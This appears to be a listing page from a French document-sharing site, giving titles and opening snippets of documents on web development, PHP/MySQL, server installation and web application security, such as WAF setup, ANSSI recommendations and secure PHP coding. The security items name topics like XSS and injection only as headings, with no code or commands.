FileMaker Server 11. Publication Web personnalisée avec XML et XSLT

FileMaker Server 11. Publication Web personnalisée avec XML et XSLT FileMaker Server 11 Publication Web personnalisée avec XML et XSLT 2007-2010 FileMaker, Inc. Tous droits réservés. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, Californie 95054 FileMaker est une

Plus en détail

Installation d OwnCloud 8.0 sous Debian Avec connexion des utilisateurs active directory et mise en place de HTTPS

Installation d OwnCloud 8.0 sous Debian Avec connexion des utilisateurs active directory et mise en place de HTTPS Installation d OwnCloud 8.0 sous Debian Avec connexion des utilisateurs active directory et mise en place de HTTPS FOURNIER VINCENT 29/04/2015 1.2 Ce tutoriel est réalisé sous debian 7.7 avec une synchronisation

Plus en détail

OUAPI Guide d installation Outil d administration de parc informatique. Documentation d installation et de paramétrage

OUAPI Guide d installation Outil d administration de parc informatique. Documentation d installation et de paramétrage Outil d administration de parc informatique Documentation d installation et de paramétrage Nicolas BIDET Ouapi.org 29/07/2012 Sommaire Installation de Wampserver... 3 1.1. Téléchargement de WampServer...

Plus en détail

OZSSI NORD 4 JUIN 2015 - LILLE. Conférence thématique: Sécurité des applications

OZSSI NORD 4 JUIN 2015 - LILLE. Conférence thématique: Sécurité des applications OZSSI NORD 4 JUIN 2015 - LILLE Conférence thématique: Sécurité des applications www.advens.fr Document confidentiel - Advens 2015 Présentation de la société Advens 2 La sécurité est source de valeur Pas

Plus en détail

Mysql. Les requêtes préparées Prepared statements

Mysql. Les requêtes préparées Prepared statements Mysql Les requêtes préparées Prepared statements Introduction Les prepared statements côté serveur sont une des nouvelles fonctionnalités les plus intéressantes de MySQL 4.1 (récemment sorti en production

Plus en détail

Audit Sécurité vendredi 13 novembre 2009 1

Audit Sécurité vendredi 13 novembre 2009 1 Audit Sécurité 1 Ordre du jour Présentation de l atelier Audit boîte noire Audit à code ouvert 2 Qui parle? Philippe Gamache Parler haut, interagir librement : audit de sécurité, formations Caviste de

Plus en détail

Sommaire. 1 Introduction 19. 2 Présentation du logiciel de commerce électronique 23

Sommaire. 1 Introduction 19. 2 Présentation du logiciel de commerce électronique 23 1 Introduction 19 1.1 À qui s adresse cet ouvrage?... 21 1.2 Comment est organisé cet ouvrage?... 22 1.3 À propos de l auteur... 22 1.4 Le site Web... 22 2 Présentation du logiciel de commerce électronique

Plus en détail

PHP 5.4 Développez un site web dynamique et interactif

PHP 5.4 Développez un site web dynamique et interactif Editions ENI PHP 5.4 Développez un site web dynamique et interactif Collection Ressources Informatiques Table des matières Table des matières 1 Chapitre 1 Introduction 1. Objectif de l'ouvrage.............................................

Plus en détail

Guide d installation de SugarCRM Open Source version 4.5.1

Guide d installation de SugarCRM Open Source version 4.5.1 Guide d installation de SugarCRM Open Source version 4.5.1 Version 1.0.2 Mentions légales Mentions légales Ce document est susceptible de modification à tout moment sans notification. Disclaimer / Responsabilité

Plus en détail

WEB & DÉVELOPPEMENT LES BASES DU WEB LE LANGAGE HTML FEUILLES DE STYLES CSS HISTORIQUE D INTERNET ET DU WEB LES DIFFÉRENTS LANGAGES

WEB & DÉVELOPPEMENT LES BASES DU WEB LE LANGAGE HTML FEUILLES DE STYLES CSS HISTORIQUE D INTERNET ET DU WEB LES DIFFÉRENTS LANGAGES WEB & DÉVELOPPEMENT LES BASES DU WEB HISTORIQUE D INTERNET ET DU WEB LES DIFFÉRENTS LANGAGES LE LANGAGE HTML STRUCTURE D UNE PAGE En-tête et corps Syntaxe INSÉRER DES CONTENUS Texte : formatage (titre,

Plus en détail

Stockage du fichier dans une table mysql:

Stockage du fichier dans une table mysql: Stockage de fichiers dans des tables MYSQL avec PHP Rédacteur: Alain Messin CNRS UMS 2202 Admin06 30/06/2006 Le but de ce document est de donner les principes de manipulation de fichiers dans une table

Plus en détail

Projet 2. Gestion des services enseignants CENTRE D ENSEIGNEMENT ET DE RECHERCHE EN INFORMATIQUE. G r o u p e :

Projet 2. Gestion des services enseignants CENTRE D ENSEIGNEMENT ET DE RECHERCHE EN INFORMATIQUE. G r o u p e : CENTRE D ENSEIGNEMENT ET DE RECHERCHE EN INFORMATIQUE Projet 2 Gestion des services enseignants G r o u p e : B E L G H I T Y a s m i n e S A N C H E Z - D U B R O N T Y u r i f e r M O N T A Z E R S i

Plus en détail

arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr

arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr Auteur du document : ESRI France Version de la documentation : 1.2.0.0 Date de dernière

Plus en détail

COURS 5 Mettre son site en ligne! Exporter son site avec WordPress Duplicator Installer un logiciel FTP Faire le suivi des visites de son site avec

COURS 5 Mettre son site en ligne! Exporter son site avec WordPress Duplicator Installer un logiciel FTP Faire le suivi des visites de son site avec COURS 5 Mettre son site en ligne! Exporter son site avec WordPress Duplicator Installer un logiciel FTP Faire le suivi des visites de son site avec Google Analytics Donner votre appréciation du cours!

Plus en détail

Résoudre les problèmes PHP, les meilleures (et les pires) techniques

Résoudre les problèmes PHP, les meilleures (et les pires) techniques Résoudre les problèmes PHP, les meilleures (et les pires) techniques Xavier Gorse Architecte - Expert PHP (ELAO) xavier.gorse@elao.com Un peu d ordre dans la maison! Toutes les lignes téléphoniques sont

Plus en détail

Protection des protocoles www.ofppt.info

Protection des protocoles www.ofppt.info ROYAUME DU MAROC Office de la Formation Professionnelle et de la Promotion du Travail Protection des protocoles DIRECTION RECHERCHE ET INGENIERIE DE FORMATION SECTEUR NTIC Sommaire 1. Introduction... 2

Plus en détail

Application Web et J2EE

Application Web et J2EE Application Web et J2EE Servlet, JSP, Persistence, Méthodologie Pierre Gambarotto Département Informatique et Math appli ENSEEIHT Plan Introduction 1 Introduction Objectfis

Plus en détail

HTTP HTTP. IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin. Introduction et architecture Messages Authentification Conclusion

HTTP HTTP. IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin. Introduction et architecture Messages Authentification Conclusion HTTP IUT1 dpt SRC L Isle d Abeau Jean-françois Berdjugin HTTP Introduction et architecture Messages Authentification Conclusion 1 HTTP Introduction et architecture Hypertext Transfert Protocol URI (Uniform

Plus en détail

Dans l'épisode précédent

Dans l'épisode précédent Dans l'épisode précédent 2 Le réseau SERVEURS POSTE CLIENT POSTE CLIENT wifi SERVEURS POSTE CLIENT switch Borne Wifi SERVEURS routeur POSTE CLIENT? SERVEURS SERVEURS SERVEURS POSTE CLIENT SERVEURS 3 Les

Plus en détail

Dossier Technique. Détail des modifications apportées à GRR. Détail des modifications apportées à GRR Le 17/07/2008. Page 1/10

Dossier Technique. Détail des modifications apportées à GRR. Détail des modifications apportées à GRR Le 17/07/2008. Page 1/10 Dossier Technique Page 1/10 Sommaire : 1. REPONSE TECHNIQUE A LA DEMANDE 3 1.1. Prise en compte de la dernière version de phpcas 3 1.2. Gestion de la connexion à GRR 3 1.2.1. Récupération des attributs

Plus en détail

PHP 4 PARTIE : BASE DE DONNEES

PHP 4 PARTIE : BASE DE DONNEES PHP 4 PARTIE : BASE DE DONNEES 1. Introduction 2. Présentation de MySQL 3. Principe 4. Connexion 5. Interrogation 6. Extraction des données 7. Fonctions de services 8. Traitement des erreurs 9. Travaux

Plus en détail

3W Academy Programme de Formation Développeur Intégrateur web Total : 400 heures

3W Academy Programme de Formation Développeur Intégrateur web Total : 400 heures 3W Academy Programme de Formation Développeur Intégrateur web Total : 400 heures Objectif global : A l issue de la formation, les stagiaires doivent être opérationnels dans la création d un site internet

Plus en détail

L3 informatique TP n o 2 : Les applications réseau

L3 informatique TP n o 2 : Les applications réseau L3 informatique TP n o 2 : Les applications réseau Sovanna Tan Septembre 2009 1/20 Sovanna Tan L3 informatique TP n o 2 : Les applications réseau Plan 1 Transfert de fichiers 2 Le Courrier électronique

Plus en détail

Développement des Systèmes d Information

Développement des Systèmes d Information Développement des Systèmes d Information Axe ISI Camille Persson Institut Fayol / LSTI / ISCOD École Nationale Supérieure des Mines de Saint-Etienne 158 cours Fauriel, 42000 Saint-Etienne persson@emse.fr

Plus en détail

E-TRANSACTIONS. Guide du programmeur API Plug-in. Version 1.1

E-TRANSACTIONS. Guide du programmeur API Plug-in. Version 1.1 E-TRANSACTIONS Guide du programmeur API Plug-in Version 1.1 Avertissements : Le fichier Version.txt précise l'environnement dans lequel l API a été compilée et testée. L'installation de l API sur tout

Plus en détail

Installer Enterprise Miner 5.1 en SAS9.1.3 - environnement Windows

Installer Enterprise Miner 5.1 en SAS9.1.3 - environnement Windows Installer Enterprise Miner 5.1 en SAS9.1.3 - environnement Windows Introduction :... 3 1. Présentation de l architecture Enterprise Miner 5.1 :... 4 2. Installation d Enterprise Miner 5.1:... 5 3. Post-installation

Plus en détail

Présentation de la solution Open Source «Vulture» Version 2.0

Présentation de la solution Open Source «Vulture» Version 2.0 Présentation de la solution Open Source «Vulture» Version 2.0 Advens IST Day 15 septembre 2011 http://www.vultureproject.org 1 s/apache/mod_perl/ LE PROJET VULTURE Advens IST Day 15 septembre 2011 http://www.vultureproject.org

Plus en détail

Par l'exemple de. Laurent Destailleur

Par l'exemple de. Laurent Destailleur Bonnes pratiques Par l'exemple de Laurent Destailleur Objectifs et plan de la présentation Présenter les pratiques PHP et règles de l'art du développement PHP, avec retour d'expérience Principe de la présentation

Plus en détail

WEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY

WEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY WEB APPLICATION FIREWALL AVEC APACHE ET MOD_SECURITY version 1.00 Objectifs Cette fiche pratique permet d atteindre deux objectifs distincts et potentiellement complémentaires. Configuration d Apache en

Plus en détail

FORMATION PcVue. Mise en œuvre de WEBVUE. Journées de formation au logiciel de supervision PcVue 8.1. Lieu : Lycée Pablo Neruda Saint Martin d hères

FORMATION PcVue. Mise en œuvre de WEBVUE. Journées de formation au logiciel de supervision PcVue 8.1. Lieu : Lycée Pablo Neruda Saint Martin d hères FORMATION PcVue Mise en œuvre de WEBVUE Journées de formation au logiciel de supervision PcVue 8.1 Lieu : Lycée Pablo Neruda Saint Martin d hères Centre ressource Génie Electrique Intervenant : Enseignant

Plus en détail

Documentation de conception

Documentation de conception Documentation de conception La présente documentation précise les choix de modélisation, détaille les fonctionnalités (en sus de la documentation utilisateur), documente la conception de la base de donnes

Plus en détail

Programmation Web. Madalina Croitoru IUT Montpellier

Programmation Web. Madalina Croitoru IUT Montpellier Programmation Web Madalina Croitoru IUT Montpellier Organisation du cours 4 semaines 4 ½ h / semaine: 2heures cours 3 ½ heures TP Notation: continue interrogation cours + rendu à la fin de chaque séance

Plus en détail

TIC. Réseau informatique. Historique - 1. Historique - 2. TC - IUT Montpellier Internet et le Web

TIC. Réseau informatique. Historique - 1. Historique - 2. TC - IUT Montpellier Internet et le Web Réseau informatique TIC TC - IUT Montpellier Internet et le Web Ensemble d'ordinateurs reliés entre eux et échangeant des informations sous forme de données numériques But : Rendre disponible l information

Plus en détail

PHP 5. La base de données MySql. A. Belaïd 1

PHP 5. La base de données MySql. A. Belaïd 1 PHP 5 La base de données MySql A. Belaïd 1 Base de données C est quoi une base de données? Une base de données contient une ou plusieurs tables, chaque table ayant un ou plusieurs enregistrements Exemple

Plus en détail

Aide à la Détection de Faiblesses d un site Web Mandataire inverse, Modsecurity

Aide à la Détection de Faiblesses d un site Web Mandataire inverse, Modsecurity Aide à la Détection de Faiblesses d un site Web, S. Aicardi Journées Mathrice, Angers, 17-19 Mars 2009 Serveur mandataire (Proxy) C est un serveur utilisé comme intermédiaire entre des clients et des serveurs.

Plus en détail

Système Normalisé de Gestion des Bibliothèques -SYNGEB : version Réseau-

Système Normalisé de Gestion des Bibliothèques -SYNGEB : version Réseau- Ministère de l Enseignement Supérieur et de la Recherche Scientifique Centre de Recherche sur l Information Scientifique et Technique Système Normalisé de Gestion des Bibliothèques -SYNGEB : version Réseau-

Plus en détail

Logiciel : GLPI Version : 0.72.4 SYNCRHONISATION DE GLPI AVEC ACTIVE DIRECTORY. Auteur : Claude SANTERO Config. : Windows 2003.

Logiciel : GLPI Version : 0.72.4 SYNCRHONISATION DE GLPI AVEC ACTIVE DIRECTORY. Auteur : Claude SANTERO Config. : Windows 2003. Ce document est libre de droit, merci simplement de respecter son auteur. Toutes remarques ou commentaires seront les bienvenues. ATTENTION : La mise à jour par script entre GLPI et Active Directory ne

Plus en détail

COMPÉTENCES TECHNIQUES

COMPÉTENCES TECHNIQUES André RIHANI, 43 ans DEUG A (MPM), 1993 Anglais courant 06.15.30.08.31 andre@rihani.fr DÉVELOPPEUR PHP ORANGE: Développeur LAMP (Linux, Apache, MySql, Php) durant 7 ans, tests unitaires et fonctionnels,

Plus en détail

Mise en oeuvre d un intranet à partir de logiciels Open Source avec intégration des certificats numériques et login unique

Mise en oeuvre d un intranet à partir de logiciels Open Source avec intégration des certificats numériques et login unique Mise en oeuvre d un intranet à partir de logiciels Open Source avec intégration des certificats numériques et login unique N. Clément, F. Dal, X. Jeannin, M.T. Nguyen CNRS/UREC http://www.urec.cnrs.fr

Plus en détail

LISTES DE DISTRIBUTION GÉRÉES PAR SYMPA DOCUMENT EXPLICATIF DE L'INTERFACE WEB À L'INTENTION DES ABONNÉS

LISTES DE DISTRIBUTION GÉRÉES PAR SYMPA DOCUMENT EXPLICATIF DE L'INTERFACE WEB À L'INTENTION DES ABONNÉS LISTES DE DISTRIBUTION GÉRÉES PAR SYMPA DOCUMENT EXPLICATIF DE L'INTERFACE WEB À L'INTENTION DES ABONNÉS MAI 2013 Table des matières 1. Introduction... 3 2. Interface d accueil... 4 2.1. Zone d authentification...

Plus en détail

PHP et mysql. Code: php_mysql. Olivier Clavel - Daniel K. Schneider - Patrick Jermann - Vivian Synteta Version: 0.9 (modifié le 13/3/01 par VS)

PHP et mysql. Code: php_mysql. Olivier Clavel - Daniel K. Schneider - Patrick Jermann - Vivian Synteta Version: 0.9 (modifié le 13/3/01 par VS) PHP et mysql php_mysql PHP et mysql Code: php_mysql Originaux url: http://tecfa.unige.ch/guides/tie/html/php-mysql/php-mysql.html url: http://tecfa.unige.ch/guides/tie/pdf/files/php-mysql.pdf Auteurs et

Plus en détail

Formation en Logiciels Libres. Fiche d inscription

Formation en Logiciels Libres. Fiche d inscription République Tunisienne Ministère de l'industrie et la Technologie - Secrétariat d'état de la Technologie Unité des Logiciels Libres Formation en Logiciels Libres Fiche d inscription (Une fiche par candidat)

Plus en détail

Gestion d identités PSL Exploitation IdP Authentic

Gestion d identités PSL Exploitation IdP Authentic Gestion d identités PSL Exploitation IdP Authentic Entr ouvert SCOP http ://www.entrouvert.com Table des matières 1 Arrêt et démarrage 2 2 Configuration 2 2.1 Intégration à la fédération............................

Plus en détail

Note technique. Recommandations pour la sécurisation des sites web

Note technique. Recommandations pour la sécurisation des sites web DAT-NT-009/ANSSI/SDE P R E M I E R M I N I S T R E Secrétariat général Paris, le 22 avril 2013 de la défense et de la sécurité nationale N o DAT-NT-009/ANSSI/SDE/NP Agence nationale de la sécurité Nombre

Plus en détail

Bernard Lecomte. Débuter avec HTML

Bernard Lecomte. Débuter avec HTML Bernard Lecomte Débuter avec HTML Débuter avec HTML Ces quelques pages ont pour unique but de vous donner les premiers rudiments de HTML. Quand vous les aurez lues, vous saurez réaliser un site simple.

Plus en détail

BTS SIO SISR3 TP 1-I Le service Web [1] Le service Web [1]

BTS SIO SISR3 TP 1-I Le service Web [1] Le service Web [1] SISR3 TP 1-I Le service Web [1] Objectifs Comprendre la configuration d'un service Web Définir les principaux paramètres d'exécution du serveur Gérer les accès aux pages distribuées Mettre à disposition

Plus en détail

ADF 2009 Sécurisation d applications PHP/MySQL

ADF 2009 Sécurisation d applications PHP/MySQL ADF 2009 Sécurisation d applications PHP/MySQL Magali Contensin contensin@ibdml.univ-mrs.fr Plan 1. Filtrer les entrées, protéger les sorties 2. Sécurité par l obscurité 3. XSS 4. Injections 5. CSRF 6.

Plus en détail

Par KENFACK Patrick MIF30 19 Mai 2009

Par KENFACK Patrick MIF30 19 Mai 2009 Par KENFACK Patrick MIF30 19 Mai 2009 1 Introduction II. Qu est ce qu un OpenId? III. Acteurs IV. Principe V. Implémentation VI. Sécurité VII. conclusion I. 2 Vue le nombre croissant de sites web nous

Plus en détail

Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria

Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria 1 Philippe Lecler TutoJRES «Sécurité des sites WEB» 4 février 2010 Contexte 2 PCI-DSS : Payment Card Industry Data Security

Plus en détail

Protocole SSH-2.0. Tuan-Tu, TRAN. Janvier 2009

Protocole SSH-2.0. Tuan-Tu, TRAN. Janvier 2009 Janvier 2009 1 2 Etablissement des clés de session Protection des données échangées 3 Identification par mot de passe Identification par clé publique Identification par hôte 4 Utilisations de Secure Shell

Plus en détail

Failles des applications Web. Ce document est extrait du travail de diplôme de M. DIZON dans l état.

Failles des applications Web. Ce document est extrait du travail de diplôme de M. DIZON dans l état. Failles des applications Web Ce document est extrait du travail de diplôme de M. DIZON dans l état. 1 Introduction...1 2 Contournement de validation javascript...2 2.1 Introduction...2 2.2 Principe de

Plus en détail

arcopole Studio Annexe 7 Architectures Site du programme arcopole : www.arcopole.fr

arcopole Studio Annexe 7 Architectures Site du programme arcopole : www.arcopole.fr 4 arcopole Studio Annexe 7 Architectures Site du programme arcopole : www.arcopole.fr Auteur du document : Esri France Version de la documentation : 1.2 Date de dernière mise à jour : 26/02/2015 Sommaire

Plus en détail

Extension SSO Java. Cette note technique décrit la configuration et la mise en œuvre du filtre de custom SSO Java.

Extension SSO Java. Cette note technique décrit la configuration et la mise en œuvre du filtre de custom SSO Java. Note technique W4 Engine Extension SSO Java Cette note technique décrit la configuration et la mise en œuvre du filtre de custom SSO Java. 1 Présentation 3 2 Custom SSO Java 4 3 Bilan 10 Sommaire Référence

Plus en détail

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet Expérience d un hébergeur public dans la sécurisation des sites Web, CCK Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet Plan Introduction Sécurisation des sites Web hébergés a Conclusion Introduction

Plus en détail

(structure des entêtes)

(structure des entêtes) Aide mémoire HTTP (structure des entêtes) Fabrice HARROUET École Nationale d Ingénieurs de Brest http://www.enib.fr/~harrouet/ enib 1/10 Structure générale d une requête Requête HTTP méthode ressource

Plus en détail

Mise en place d un serveur trixbox sur un domaine Kwartz. Version 1.0 du 25 juin 2012 Lycée Polyvalent d Artois, Noeux les Mines Adrien Bonnel

Mise en place d un serveur trixbox sur un domaine Kwartz. Version 1.0 du 25 juin 2012 Lycée Polyvalent d Artois, Noeux les Mines Adrien Bonnel Mise en place d un serveur trixbox sur un domaine Kwartz Version 1.0 du 25 juin 2012 Lycée Polyvalent d Artois, Noeux les Mines Adrien Bonnel 1 Télécharger trixbox CE 2.8.0.4 Vous pouvez récupérer le fichier

Plus en détail

DenyAll Detect. Documentation technique 27/07/2015

DenyAll Detect. Documentation technique 27/07/2015 DenyAll Detect Documentation technique 27/07/2015 Sommaire 1. A propos de ce document... 3 1.1 Objet... 3 1.2 Historique... 3 1.3 Contexte... 3 2. Liste des tests... 4 2.1 Découverte réseau (scan de ports)...

Plus en détail